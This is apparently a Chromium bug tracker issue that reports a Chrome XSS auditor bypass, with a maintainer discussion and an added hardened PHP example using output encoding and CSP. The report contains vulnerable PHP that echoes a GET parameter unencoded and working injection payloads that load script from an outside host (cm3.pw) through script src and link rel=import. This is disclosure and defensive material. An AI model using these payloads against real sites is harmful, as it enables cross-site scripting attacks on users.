Issue 608653


Issue metadata

Status: Duplicate
Closed: May 2016
Type: Bug

Security: Bypass chrome xss auditor under some conditons

Reported by nohack...@gmail.com, May 3 2016

Issue description

VULNERABILITY DETAILS
When there exists a script after an XSS injection like <img alt="[injection]" src="x">, and the URL scheme is http

for example:
---------------------------------
<img alt="[injection]" src="x">
<script>var a=1;</script>
---------------------------------

php source code:
---------------------------------
<img alt="<?php echo $_GET['x'];?>" src="x">
<script>
var a=1;
</script>
---------------------------------

we can use:
x="><script%20src=https:www.cm3.pw/

to bypass chrome auditor.

it will load https://www.cm3.pw/" as a JS file

you can also see here:
http://cm3.pw/xss.php?x=%22%3E%3Cscript%20src=https:www.cm3.pw/


VERSION
Chrome Version: 50.0.2661.94 (64-bit)
Operating System: OSX 10.11.X



When the URL scheme is HTTP,
<img alt="[injection]" src="x"> also has a bypass like:

x=1"><link%20rel="import"%20href=https:www.cm3.pw/

No script is needed after the injection.
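The root cause in the reporter's xss.php is that $_GET['x'] is written into an attribute value unencoded, so any browser-side auditor is at best a heuristic backstop. The following is an added example, not code from the report or from Chromium: a hardened version of the same page that encodes the parameter with htmlspecialchars() and adds a Content-Security-Policy as defence in depth. It assumes PHP 8.0 or later (for str_contains); the function names h, renderPage and selfCheck and the CSP value are this example's own choices. Run from the command line it checks the two payloads from the report against the encoded template and exits 0 if neither can open a new tag.

```php
<?php
declare(strict_types=1);

// Added example (not the reporter's or Chromium's code): hardened form of the
// reported xss.php. Assumes PHP 8.0+. Names h, renderPage, selfCheck and the
// CSP header value are this example's own choices.

/**
 * Escape untrusted text for a double-quoted HTML attribute value or element body.
 * ENT_QUOTES turns both quote characters into entities, so the value can never
 * close the alt="" attribute; '<' and '>' are encoded too, so no tag can start.
 */
function h(string $s): string
{
    return htmlspecialchars($s, ENT_QUOTES | ENT_SUBSTITUTE | ENT_HTML5, 'UTF-8');
}

/** Build the same markup as the reported page, but with the parameter encoded. */
function renderPage(string $x): string
{
    return '<img alt="' . h($x) . '" src="x">' . "\n"
         . "<script>\nvar a=1;\n</script>\n";
}

/**
 * Render the two payloads from the report and verify that the output still
 * contains only the three tags the template itself emits. Returns true on success.
 */
function selfCheck(): bool
{
    // Constructed inputs: the URL-decoded values of the two "x" parameters in the report.
    $payloads = [
        '"><script src=https:www.cm3.pw/',
        '1"><link rel="import" href=https:www.cm3.pw/',
    ];
    foreach ($payloads as $p) {
        $html = renderPage($p);
        $tagsOk    = substr_count($html, '<') === 3;   // <img>, <script>, </script>
        $noInject  = !str_contains($html, '<script src')
                  && !str_contains($html, '<link');
        // The payload must survive only as entity-encoded text inside alt="".
        $altIntact = str_contains($html, 'alt="&quot;&gt;&lt;script')
                  || str_contains($html, 'alt="1&quot;&gt;&lt;link');
        if (!($tagsOk && $noInject && $altIntact)) {
            return false;
        }
    }
    return true;
}

if (PHP_SAPI === 'cli') {
    exit(selfCheck() ? 0 : 1);
}

// Defence in depth when served over HTTP: only same-origin scripts may run and
// nothing may be sniffed into a script. Output encoding above is the actual fix;
// the CSP limits the damage if an encoding bug is ever introduced elsewhere.
header("Content-Security-Policy: script-src 'self'; object-src 'none'; base-uri 'none'");
header('X-Content-Type-Options: nosniff');
header('Content-Type: text/html; charset=UTF-8');
echo renderPage((string) ($_GET['x'] ?? ''));
```

Note that `script-src 'self'` matches only the page's own origin (scheme, host and port), so a script from www.cm3.pw on a page served from cm3.pw would be blocked by the policy even if encoding were missing; the encoding is still what makes the injection inert.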

Comment 2 by f...@chromium.org, May 6 2016

Components: Blink>SecurityFeature
Owner: tsepez@chromium.org
tsepez@, what's in/out of scope for the XSS auditor? I notice we get a lot of these, it might be good to add to the sheriff docs or FAQ.

Comment 3 by ClusterFuzz, May 6 2016

Status: Assigned (was: Unconfirmed)

Comment 4 by f...@chromium.org, May 10 2016

tom, ping, can you please take a look at this one too?
Labels: -Type-Bug-Security -Restrict-View-SecurityTeam Type-Bug
Thanks for the report. We don't usually track XSS auditor bypasses as security vulnerabilities, but this may still be a bug.

Comment 6 by nohack...@gmail.com, May 11 2016

Alright, thanks for paying attention to my issue again.

Comment 7 by tsepez@chromium.org, May 11 2016

Status: WontFix (was: Assigned)
We give a pass to same-origin scripts to cut down on the XSSAuditor false positive rate.  If you try injecting a script from a different origin, and it is still not caught, then feel free to re-open the bug.

Comment 8 by nohack...@gmail.com, May 19 2016

Well, I don't think the same-origin limit works on my POC:
"
<img alt="[injection]" src="x"> also has bypass like:

x=1"><link%20rel="import"%20href=https:www.cm3.pw/

"

You can test it.

Comment 9 by tsepez@chromium.org, May 19 2016

Mergedinto: 613123
Status: Duplicate (was: WontFix)
Yup. Got another report. Thanks.
23333
Is this bug already fixed?
I don't think so; to my disappointment it was marked as a duplicate of another one reported even later than mine.
And I have no permission to access that one (id=`613123`).
But anyway, I'd like to pay my respects to teacher P here 0.0!

Sorry about the "duplicate to later", result of misdiagnosing this original issue and having the second report come in.
Never mind, thank you.